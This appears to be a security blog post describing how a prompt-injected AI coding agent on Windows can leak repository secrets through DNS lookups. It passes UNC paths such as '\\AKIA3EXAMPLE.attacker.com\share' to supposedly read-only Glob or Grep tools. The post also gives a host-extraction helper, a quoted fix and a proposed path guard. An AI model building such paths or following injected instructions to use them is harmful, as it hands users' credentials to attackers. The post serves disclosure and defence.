What if a prompt-injected agent could use supposedly safe, read-only tools to silently exfiltrate your secrets?


Data exfiltration from AI coding agents is a well-documented attack class. Johann Rehberger (embracethered) has published extensively on this topic.

After the Claude Code source was leaked, I noticed something interesting: UNC path checks throughout its tools and permission system. That made me think of UNC paths as an attack vector. If an agent lacks such checks, the bug could be used for data exfiltration via DNS resolution.

UNC Path DNS Exfiltration

On Windows, when any program accesses a UNC path like:

\\SOMETHING.attacker.com\share

the OS performs a DNS lookup for SOMETHING.attacker.com. The attacker controls the authoritative DNS server for attacker.com and logs every query, so whatever is placed in SOMETHING reaches the attacker. This way, a prompt-injected agent can exfiltrate repository secrets to a third party without access to any Bash tool.

In Claude Code, we can use the Glob or Grep tool, which uses ripgrep under the hood. The tool accepts a pattern and a file path such as:

\\AKIA3EXAMPLE.attacker.com\share

Windows resolves AKIA3EXAMPLE.attacker.com. The attacker’s DNS server logs the query. No file needs to exist, and no connection needs to succeed. The DNS resolution alone leaks the data.
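
To make it concrete which part of the path leaks, here is a minimal TypeScript sketch that extracts the host name Windows would try to resolve from a UNC-style path. The uncHost helper is hypothetical and is not taken from any agent's source. It assumes forward slashes are treated like backslashes, and it deliberately skips device prefixes such as \\?\ and \\.\ rather than parsing them.

```typescript
// Hypothetical helper for illustration only.
// Returns the host component of a UNC-style path, or null if the
// path does not look like \\host\share (or //host/share).
function uncHost(path: string): string | null {
  // Assumption: forward slashes are equivalent to backslashes here.
  const normalized = path.replace(/\//g, "\\");

  // Two leading backslashes, then everything up to the next separator.
  const match = /^\\\\([^\\]+)/.exec(normalized);
  const host = match?.[1];

  // "\\?\" and "\\.\" are device prefixes, not host names; this sketch
  // does not try to interpret them.
  if (!host || host === "?" || host === ".") {
    return null;
  }
  return host;
}
```

For the path above, uncHost("\\\\AKIA3EXAMPLE.attacker.com\\share") returns "AKIA3EXAMPLE.attacker.com", which is exactly the name that ends up in the attacker's DNS log. An ordinary path such as "C:\\repo\\src" yields null.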

Currently, this is fixed in Claude Code with this condition:

// Block UNC paths before any filesystem access to prevent network
// requests (DNS/SMB) during validation on Windows
if (filePath.startsWith('//') || filePath.startsWith('\\\\')) {
    return {resolvedPath: filePath, isSymlink: false, isCanonical: false}
}
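
The same idea can be applied as a standalone guard in front of any tool that takes a path argument. The following is a sketch under assumptions, not Claude Code's implementation: assertNotUncPath and UncPathError are hypothetical names, and the check also rejects mixed separators (such as \/host), which is an extra precaution beyond the condition quoted above.

```typescript
// Hypothetical error type so callers can tell this rejection apart
// from ordinary filesystem errors.
class UncPathError extends Error {}

// Hypothetical guard: call it on every user- or model-supplied path
// BEFORE any filesystem access (stat, realpath, glob, ripgrep, ...).
function assertNotUncPath(filePath: string): string {
  // Any two leading separators are treated as a UNC-style prefix.
  // This is stricter than checking only "//" and "\\\\".
  if (/^[\\/]{2}/.test(filePath)) {
    throw new UncPathError(`Refusing UNC-style path: ${filePath}`);
  }
  return filePath;
}
```

A tool handler would call assertNotUncPath(input.path) as its first step and only then resolve or search the path. On non-Windows systems a leading // has no network meaning, so a real implementation might apply the check only on Windows.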

But what about other agents?…